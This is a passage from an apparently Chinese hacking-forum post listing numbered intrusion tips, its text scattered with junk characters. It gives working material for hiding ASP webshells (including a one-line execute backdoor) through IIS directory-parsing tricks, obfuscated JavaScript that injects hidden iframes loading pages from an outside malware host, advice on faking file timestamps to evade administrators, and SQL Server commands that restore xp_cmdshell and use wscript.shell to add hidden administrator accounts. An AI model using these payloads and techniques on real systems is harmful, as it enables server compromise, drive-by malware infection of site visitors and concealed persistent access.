用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。 \3 e& |$ l/ a$ _+ K# W$ X- i
2 s/ A1 x4 P* T! K53、隐藏ASP后门的两种方法! ^# I) [; b& m- v# i5 U8 w
1、建立非标准目录:mkdir images..\
- j" d H0 X6 M拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp- d/ h& p2 R: y* Z$ q0 n& l+ C
通过web访问ASP木马:http://ip/images../news.asp?action=login7 U+ Z4 I1 w' H
如何删除非标准目录:rmdir images..\ /s
1 Y7 N2 A1 t; V2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:4 p3 u. g. y, _& o: t3 q
mkdir programme.asp. v5 z8 n) K# Q) S0 I: `& T
新建1.txt文件内容:<!--#include file=”12.jpg”-->- n4 Q: Y1 c1 G$ |" M
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
* c& k$ Q0 L! V: \3 g: tattrib +H +S programme.asp1 Q3 h3 @9 W0 m+ i5 N! k1 g! Z5 _: E
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
, J- P$ t9 S2 c3 h- @( m9 b. w3 U5 t; [! {
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。) b9 x! ?) R. N2 Z: j* K0 R6 O3 U
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。2 ?8 b* O- x+ k
# \$ |, h. h' @0 g/ A$ \# |/ F
55、JS隐蔽挂马5 w2 g2 w% b! R# D. K" l; @. w
1.3 M1 |+ z% d5 ?( L( D
var tr4c3="<iframe src=ht";
; k, S4 \1 U/ e& h4 ]& V( Utr4c3 = tr4c3+"tp:/";) H, d0 T$ n" a
tr4c3 = tr4c3+"/ww";! ~& N, T# i4 x. M& m
tr4c3 = tr4c3+"w.tr4";( \7 M6 e5 s/ Y/ S1 ^4 |
tr4c3 = tr4c3+"c3.com/inc/m";9 Q5 A9 w7 P6 g. _/ A: a. M* k
tr4c3 = tr4c3+"m.htm style="display:none"></i";" s& f) C) W' G$ w. @
tr4c3 =tr4c3+"frame>'";
; |+ h' c# ~# f: n% cdocument.write(tr4c3);
6 L4 L Q1 E1 ?" u4 F避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
) o( E8 c0 f$ V* W+ h" C. U* w8 x1 X z2 m( D- E9 E
2.
& ~& v/ [3 X( f9 Z- A转换进制,然后用EVAL执行。如
R( Q, @& \5 \0 D; K Q; J! Keval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
4 s- h) b& a( J+ m不过这个有点显眼。
( C4 Q! Z/ g" g4 c) C3.
* U1 }) y; S+ _2 ]1 qdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
( `4 L; U0 d/ y9 L0 ^9 w& C& k最后一点,别忘了把文件的时间也修改下。! n. v2 n, u0 N4 p
) J' M. X1 z- F5 M, k2 C) y
56.3389终端入侵常用DOS命令
9 v7 n6 H) x. \7 Htaskkill taskkill /PID 1248 /t5 O; Z- E6 ?. u! m% Y/ G
E; G1 U/ n! u& l U; ftasklist 查进程6 e2 O9 p: A, k
( R. X- c; S; b0 y+ [4 K# s
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
! B# J4 w3 T: q) piisreset /reboot( S7 q1 s4 i' N: a' T0 v
tsshutdn /reboot /delay:1 重起服务器
" _; ]. b. n0 k; v6 r3 F- O9 D) C
; Q2 ]1 m4 g; b+ c$ Tlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
7 M" ?& I6 e6 b" u; c( p
7 y3 O$ ]; z, G6 {6 ^# C3 F7 L4 oquery user 查看当前终端用户在线情况7 ]- f3 H3 [5 n
\$ Z1 K$ O7 p0 K! O$ f$ v要显示有关所有会话使用的进程的信息,请键入:query process *. w7 x0 R4 o2 G* h
8 v, `" k+ X0 X0 I/ p要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:22 M8 @4 F8 _. x* N
- u. L- G6 ?# N1 l7 d1 \2 s; r1 R要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER23 D, Y/ g. b e' N# m
3 e! G- L6 ~9 x! ]' l
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
# m* _# n6 T# a9 _
( P! @' M5 U4 @' Q+ B+ g4 }; c# T3 v命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
! l# F0 j L. v. R: C& H
* D, e* ^% `( Z1 V+ p命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
; E9 k. ?5 G9 j2 Q& B
/ O3 t' y9 F) x8 \1 W命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
& m5 x% f: l" O* F( o3 c- ~
+ P; h$ f3 \3 h& v' W9 c k. l命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机 p; o& l; E3 T% Y# D
5 _$ ?/ D6 d. `9 v. S' j. o56、在地址栏或按Ctrl+O,输入:
% G6 x+ l% @3 q" D- F" P5 Cjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s; J' C2 C1 {0 ~+ t6 }
$ k/ E! }: ^$ _- B8 u/ b2 {% V; B, G
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。. ]8 L. I* X Z1 ^
% @9 c7 Y" R% ~2 M57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
9 c0 G" k$ d( ~& \用net localgroup administrators是可以看到管理组下,加了$的用户的。
" E& P$ N6 Y3 J) ^* N9 Q
" H1 C% e# h* ]* L58、 sa弱口令相关命令" W7 M5 ?4 Y1 }( {$ {4 P4 @. Y
0 [* P& x* O& X- H
一.更改sa口令方法:
0 t+ h- `; M1 ?5 B+ C$ j% {4 h [用sql综合利用工具连接后,执行命令:+ M7 N& J( b# d+ W+ e+ S6 E
exec sp_password NULL,'20001001','sa'
1 X5 U3 c/ ^# B7 S+ I4 x(提示:慎用!); [& ]9 V$ c7 S
% t% l1 t7 e" ~: Z4 z' J二.简单修补sa弱口令.; C+ o) W; ~$ P4 c0 M
3 v6 @5 f5 I4 ~( O. S/ V4 @" \( W
方法1:查询分离器连接后执行:
0 {5 M1 N. A$ @if exists (select * from3 X4 C' _+ [: H
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
& m8 `2 I( t T& XOBJECTPROPERTY(id, N'IsExtendedProc') = 1)2 j' }' X& J( @
% |8 l" H u. l; z( i3 t( S0 ?) {6 Nexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
9 D3 g' H$ Z/ f' R% J9 S
3 I- y# z- {) b- F1 i7 YGO- B% D, D* `: C3 P" z' b
# S# c e0 A% q7 e然后按F5键命令执行完毕
2 J! V0 |; Z2 D8 d( a( u2 B6 k; _' A& j: t1 p5 l1 D. f
方法2:查询分离器连接后! F( ^" b; y% M0 }) z: B( y1 H
第一步执行:use master
7 l0 `9 b9 N" n+ O# T第二步执行:sp_dropextendedproc 'xp_cmdshell'
! o7 E5 B# ^1 N# c然后按F5键命令执行完毕5 }7 x, f, m' P( I" l# J
, ~# N8 \/ P4 y5 k
( E2 }; e# Y' k' h! I' d3 Q8 o" u
三.常见情况恢复执行xp_cmdshell.
9 x; W5 T) W& Z3 w$ s$ X/ G
- [) ^( H& e6 ^9 _
# e, f- p0 {2 |1 未能找到存储过程'master..xpcmdshell'., I2 h1 V2 b y, k7 I+ x7 J$ C
恢复方法:查询分离器连接后,
$ B8 _5 L g5 L2 m第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
/ j) b$ s& {8 C3 N# k; ?3 J. E8 A* Z第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
. J( E9 f1 c! \ m然后按F5键命令执行完毕% L3 S1 \6 x3 S- B7 {
0 q1 W4 M; c# N5 ?, d% W3 T( E
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
& b8 [2 Q6 B% M' N; p恢复方法:查询分离器连接后,! @" L, F; ^3 i7 `
第一步执行:sp_dropextendedproc "xp_cmdshell"2 C2 X7 w' ?; L6 f6 r9 B
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'4 P% N1 w2 `4 ]7 k: q
然后按F5键命令执行完毕3 ?: U. b1 ?' u; y9 u5 K
' v; x3 q5 Z }; ? a2 ]- D
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。): c* ^" s! e! v/ }9 Y3 _9 g
恢复方法:查询分离器连接后,
" w2 e1 K2 f- i/ {, x第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
$ N* F: H1 T% ~; s$ Q% t/ Q b# o第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
9 S5 I) N0 u7 o E, S3 `4 n然后按F5键命令执行完毕
8 Z7 j/ a' @: x2 J
, D" m$ r# H3 _, q: _四.终极方法.& _& v( m4 G6 `
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
7 y! m/ N5 c5 J$ j/ _" d; z6 J/ Z! ]3 |7 ?查询分离器连接后,$ ^# Q& y' b8 a3 n9 I9 O
2000servser系统:
# t; H9 {& q( u& A7 O9 \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
. V& }) b, r0 a; I8 z! d' u. s r' t. M+ Q
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
8 V( A3 B$ b2 w6 ?7 C+ E. E9 W( y9 n2 }- O
xp或2003server系统:
% x9 R! c8 t! A+ d* O) F& t6 R+ Y
; b2 n: o/ ]$ C7 A2 K& bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'. P9 Z8 ~! d; B' B$ r/ ]
5 I* w: j$ {! ^5 c( n: }- ]' h6 rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. i) s- y0 f) y- R1 t6 }" P$ [7 X, i |
发表于 2012-9-15 14:13:15
收藏
支持
反对